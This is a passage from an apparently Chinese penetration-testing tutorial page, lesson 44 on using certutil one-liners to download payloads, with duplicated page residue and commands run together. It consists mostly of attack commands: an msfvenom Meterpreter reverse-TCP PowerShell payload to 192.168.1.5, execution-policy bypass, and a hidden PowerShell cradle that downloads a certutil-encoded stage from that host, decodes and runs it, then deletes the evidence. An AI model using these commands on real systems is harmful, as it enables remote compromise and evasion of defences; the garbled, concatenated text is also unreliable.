第四十四课:ertutil一句话下载payload补充
C:\>certutil -encode c:\downfile.vbs downfile.batImport-Module ./Invoke-CradleCrafter.psd1 Invoke-CradleCrafter



Last updated
Was this helpful?
C:\>certutil -encode c:\downfile.vbs downfile.batImport-Module ./Invoke-CradleCrafter.psd1 Invoke-CradleCrafter



Last updated
Was this helpful?
Was this helpful?
set-executionpolicy Bypassroot@John:/tmp# msfvenom ‐p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=53 ‐e cmd/powershell_base64 ‐f psh ‐o Micropoor.txtpowershell.exe ‐Win hiddeN ‐Exec ByPasS add‐content ‐path %APPDATA%\\cer.cer (New‐Object Net.WebClient).DownloadString('http://192.168.1.5/cer.cer'); certutil ‐decode %APPDATA%\cer.cer %APPDATA%\stage.ps1 & start /b cmd /c powershell.exe ‐Exec Bypass ‐NoExit ‐File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\cer.cer